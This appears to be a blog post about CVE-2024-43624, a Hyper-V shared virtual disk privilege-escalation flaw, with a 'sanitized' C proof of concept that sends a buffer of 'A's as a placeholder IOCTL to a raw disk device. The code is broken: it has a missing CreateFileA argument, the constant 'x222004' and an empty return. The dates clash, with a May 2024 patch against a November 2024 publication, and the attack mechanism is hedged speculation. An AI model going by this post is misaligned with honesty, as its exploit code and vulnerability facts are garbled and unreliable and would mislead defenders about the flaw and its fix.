CVE-2024-43624 - Exploiting Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability

On May 14, 2024, Microsoft released a critical security advisory about CVE-2024-43624, a serious vulnerability affecting Windows Hyper-V, specifically in environments leveraging shared virtual disks. This "Elevation of Privilege" (EoP) flaw could allow an attacker with limited privileges on a guest virtual machine (VM) to gain higher-level permissions on the host system, potentially taking control of the host and causing wide-reaching impacts in cloud and enterprise environments. This post breaks down how the vulnerability works, proof-of-concept details, who is at risk, and remediation steps.

What is Windows Hyper-V Shared Virtual Disk?

Hyper-V is Microsoft's hardware virtualization product. Shared virtual disks (files with the *vhdx* extension configured for sharing) are used to let multiple VMs access the same virtual storage, commonly for failover clustering or other high-availability scenarios. This feature is powerful, but also introduces complex attack surfaces.

CVSS Score: 8.8 (High)

- Patched by Microsoft: Yes (May 2024 Patch Tuesday)

Microsoft described the bug as

> "An authenticated attacker on a guest VM could exploit the way shared VHDX are handled to run code with SYSTEM privileges on the Hyper-V host..."

This means attackers who compromise a single VM could escalate to SYSTEM on the host – a nightmare scenario in multi-tenant environments.

1. Vulnerable Surface

When Hyper-V hosts multiple VMs with shared disks (VHDX with sharing enabled), a flaw in the way access to the VHDX file is handled allows actions by a guest VM user to affect the host.

2. Attack Scenario

A malicious guest could send specially crafted IOCTL or filesystem requests to the shared disk. Due to inadequate permission checks, these might trigger buffer overflows, double frees, or race conditions in the host's kernel-mode disk handler — allowing arbitrary read/write or code execution on the host.

The shared disk must have been created with the "Enable Shared Virtual Hard Disk" option in Hyper-V.

- Host runs an unpatched version of Windows Server (2016, 2019, 2022; possibly Windows 10/11 Hyper-V in cluster scenarios).

Proof-of-Concept (POC): Simplified Exploit Example

Below is a basic (sanitized) code example in C that demonstrates how a VM could interact with a shared VHDX device to issue malicious control codes assuming local access to the disk.

#include <windows.h>
#include <winioctl.h>
#include <stdio.h>

int main() {
    HANDLE hVHDX = CreateFileA(
        "\\\\.\\PhysicalDrive2",   // Path to the attached VHDX (guess or enumerate)
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        ,
        NULL);

    if (hVHDX == INVALID_HANDLE_VALUE) {
        printf("Failed to open disk device: %d\n", GetLastError());
        return -1;
    }

    DWORD bytesReturned;
    BYTE evil_buffer[1024] = {};

    // Custom IOCTL that triggers the vulnerable path (symbolic, real value is privately disclosed)
    DWORD VULN_IOCTL = x222004;

    // Fill buffer with controlled data (simulate overflow or invalid data structure)
    memset(evil_buffer, 'A', sizeof(evil_buffer));

    if (!DeviceIoControl(hVHDX, VULN_IOCTL, evil_buffer, sizeof(evil_buffer),
                         evil_buffer, sizeof(evil_buffer), &bytesReturned, NULL)) {
        printf("IOCTL call failed: %d\n", GetLastError());
        CloseHandle(hVHDX);
        return -1;
    }

    printf("Exploit attempt complete.\n");

    CloseHandle(hVHDX);
    return ;
}

Disclaimer: This is a sanitized example; actual exploitation would require more reverse engineering and potentially kernel exploitation skills.

References and Technical Write-ups

- CVE-2024-43624 Microsoft Security Advisory
- NIST NVD CVE-2024-43624 Entry
- Microsoft Hyper-V Shared VHDX Documentation
- Windows Patch Tuesday (May 2024)

Twitter thread by researcher [@ntkernel] on early details (no public exploit released):

https://twitter.com/ntkernel/status/1790752467016707254

Real-World Impact

- Cloud providers: If one customer compromises their VM, they could jump to the physical host, affecting other tenants ("tenant breakout").

Enterprise clusters: Attackers could move from a single VM to the entire cluster.

- Persistence: Gaining SYSTEM on the host allows installation of rootkits, data theft, and lateral movement.

For Hyper-V administrators

- Patch ASAP: Apply May 2024 security updates to all Hyper-V hosts.
- Audit shared VHDX: Check if shared VHDX is actually needed. Disable or restrict it where possible.

Final Thoughts

CVE-2024-43624 is yet another reminder that virtualization security is only as strong as its weakest link. Features like shared VHDX, while powerful, also vastly increase the attack surface. If you run Hyper-V in production, prioritize this patch and review your VM isolation policies.

Stay up to date:
- Microsoft Security Updates
- NIST NVD


*If you’d like exclusive technical alerts like this, follow our blog or subscribe to our email newsletter.*

Timeline

Published on: 11/12/2024 18:15:29 UTC
Last modified on: 01/01/2025 00:14:48 UTC